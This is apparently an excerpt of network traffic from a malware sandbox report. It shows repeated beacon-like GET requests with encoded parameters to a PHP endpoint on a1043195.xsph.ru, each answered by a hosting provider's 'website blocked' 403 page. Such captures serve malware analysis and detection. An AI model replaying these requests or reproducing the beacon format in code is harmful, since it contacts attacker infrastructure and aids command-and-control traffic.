Nov 24, 2024 04:02:26.104911089 CET	1236	IN	Data Raw: 39 2e 39 32 36 20 39 37 2e 35 31 35 36 43 32 30 30 2e 31 31 37 20 39 36 2e 39 34 32 38 20 31 39 39 2e 39 32 36 20 39 36 2e 35 36 30 39 20 31 39 39 2e 33 35 32 20 39 36 2e 33 36 39 39 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 Data Ascii: 9.926 97.5156C200.117 96.9428 199.926 96.5609 199.352 96.3699Z" fill="black"/> <path d="M311.434 112.411C311.816 111.647 311.242 111.074 310.669 110.883C308.756 110.692 307.035 110.501 305.122 110.31C306.652 108.974 308.182 107.446 309
Nov 24, 2024 04:02:26.104927063 CET	1236	IN	Data Raw: 2e 36 39 34 31 43 31 36 33 2e 39 36 38 20 33 34 2e 31 32 31 33 20 31 36 33 2e 35 38 36 20 33 32 2e 35 39 33 37 20 31 36 32 2e 34 33 38 20 33 32 2e 39 37 35 36 43 31 35 37 2e 30 38 33 20 33 35 2e 30 37 36 20 31 35 32 2e 31 31 20 33 37 2e 39 34 30 Data Ascii: .6941C163.968 34.1213 163.586 32.5937 162.438 32.9756C157.083 35.076 152.11 37.9403 147.902 41.9502C147.902 38.7041 147.902 35.4579 147.902 32.2118C147.902 31.448 146.755 30.8751 146.181 31.448C142.547 35.8398 137.956 39.086 132.983 41.9502C13
Nov 24, 2024 04:02:26.283762932 CET	1236	IN	Data Raw: 34 31 43 33 39 2e 30 37 32 33 20 31 32 31 2e 39 35 38 20 33 39 2e 30 37 32 33 20 31 31 37 2e 37 35 38 20 33 39 2e 30 37 32 33 20 31 31 34 2e 33 32 43 33 39 2e 30 37 32 33 20 31 31 33 2e 35 35 37 20 33 38 2e 33 30 37 32 20 31 31 33 2e 31 37 35 20 Data Ascii: 41C39.0723 121.958 39.0723 117.758 39.0723 114.32C39.0723 113.557 38.3072 113.175 37.5421 113.557C34.6732 115.084 32.9518 117.948 32.7605 121.195C32.7605 121.195 32.5692 121.195 32.5692 121.004C28.9352 119.667 25.1099 119.094 21.2846 118.903C2
Nov 24, 2024 04:02:26.626929998 CET	571	OUT	GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Nov 24, 2024 04:02:27.073375940 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49759	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:02:36.623478889 CET	646	OUT	GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:02:37.974050999 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:02:37.974077940 CET	1236	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
Nov 24, 2024 04:02:37.974088907 CET	448	IN	Data Raw: 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 Data Ascii: t:700;font-size:38px;line-height:100%;margin-bottom:16px;white-space:pre-line}.wrapper .content .right-side{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display
Nov 24, 2024 04:02:37.974179029 CET	1236	IN	Data Raw: 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 Data Ascii: -box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center}.wrapper .content .footer__logo svg,.wrapper .content .right-side .image-container img{width:inherit;heigh
Nov 24, 2024 04:02:37.974191904 CET	1236	IN	Data Raw: 74 6f 6d 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 36 31 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 20 61 6e 64 20 28 6d Data Ascii: tom:52px;position:absolute;right:61px}}@media screen and (max-width:1105px) and (max-height:720px){.wrapper .content .right-side{display:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block
Nov 24, 2024 04:02:37.974204063 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0 b9 d1 82 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 2f 68 31 Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div> </div>
Nov 24, 2024 04:02:37.974219084 CET	1236	IN	Data Raw: 2e 36 30 32 20 39 38 2e 32 37 39 39 20 31 36 38 2e 35 35 39 20 39 36 2e 33 37 30 34 20 31 36 39 2e 35 31 35 20 39 34 2e 38 34 32 38 43 31 36 39 2e 38 39 38 20 39 34 2e 32 37 20 31 37 30 2e 32 38 20 39 33 2e 38 38 38 31 20 31 37 30 2e 36 36 33 20 Data Ascii: .602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 170.28 93.8881 170.663 93.3152C171.619 91.9786 172.767 90.6419 173.149 88.9234C173.34 87.7777 172.575 87.2048 172.193 87.0139C171.428 86.441 170.471 86.632 169.706 87.0139C168.75 87.58
Nov 24, 2024 04:02:37.974289894 CET	1236	IN	Data Raw: 32 38 2e 39 36 37 20 39 37 2e 35 31 36 31 43 31 33 32 2e 36 30 31 20 39 36 2e 33 37 30 34 20 31 33 36 2e 32 33 35 20 39 35 2e 34 31 35 37 20 31 33 39 2e 36 37 38 20 39 34 2e 32 37 43 31 34 30 2e 36 33 34 20 39 33 2e 38 38 38 31 20 31 34 30 2e 32 Data Ascii: 28.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fill="black"/> <path d="M196.866 87.9678C193.232 87.5859 189.598 87.5859 186.155 87.5859C185.008 87.5859 185.008 89.4954 186
Nov 24, 2024 04:02:37.974302053 CET	1236	IN	Data Raw: 34 2e 30 38 33 20 31 30 39 2e 35 34 37 43 32 38 33 2e 38 39 32 20 31 30 39 2e 37 33 38 20 32 36 30 2e 37 34 39 20 31 32 38 2e 32 36 20 32 35 31 2e 35 36 38 20 31 33 39 2e 37 31 37 43 32 34 37 2e 33 36 20 31 33 37 2e 30 34 33 20 32 34 33 2e 31 35 Data Ascii: 4.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.677 224.217 116.23 215.992 114.129C217.905 107.828 219.244 101.145 220.392 94
Nov 24, 2024 04:02:37.974312067 CET	1236	IN	Data Raw: 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34 2e 37 33 30 34 20 38 39 2e 31 31 35 20 39 37 2e 39 38 31 39 20 39 30 2e Data Ascii: 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527 129.978 84.7846 136.28C8
Nov 24, 2024 04:02:38.093732119 CET	1236	IN	Data Raw: 33 20 31 32 36 2e 37 33 32 43 31 30 2e 35 37 33 38 20 31 32 37 2e 33 30 35 20 31 30 2e 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 Data Ascii: 3 126.732C10.5738 127.305 10.5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135
Nov 24, 2024 04:02:38.401078939 CET	622	OUT	GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru
Nov 24, 2024 04:02:38.838293076 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	49786	141.8.192.93	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 04:02:47.874802113 CET	688	OUT	GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: a1043195.xsph.ru Connection: Keep-Alive
Nov 24, 2024 04:02:49.280682087 CET	1236	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Sun, 24 Nov 2024 03:02:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED] Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Nov 24, 2024 04:02:49.280725956 CET	224	IN	Data Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
Nov 24, 2024 04:02:49.280735970 CET	1236	IN	Data Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
Nov 24, 2024 04:02:49.280833006 CET	1236	IN	Data Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
Nov 24, 2024 04:02:49.280847073 CET	1236	IN	Data Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
Nov 24, 2024 04:02:49.280865908 CET	1236	IN	Data Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
Nov 24, 2024 04:02:49.280879974 CET	1236	IN	Data Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
Nov 24, 2024 04:02:49.280894995 CET	1236	IN	Data Raw: 34 2e 31 33 31 20 31 30 36 2e 31 30 38 20 31 33 34 2e 35 31 34 20 31 30 35 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35 Data Ascii: 4.131 106.108 134.514 105.726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.
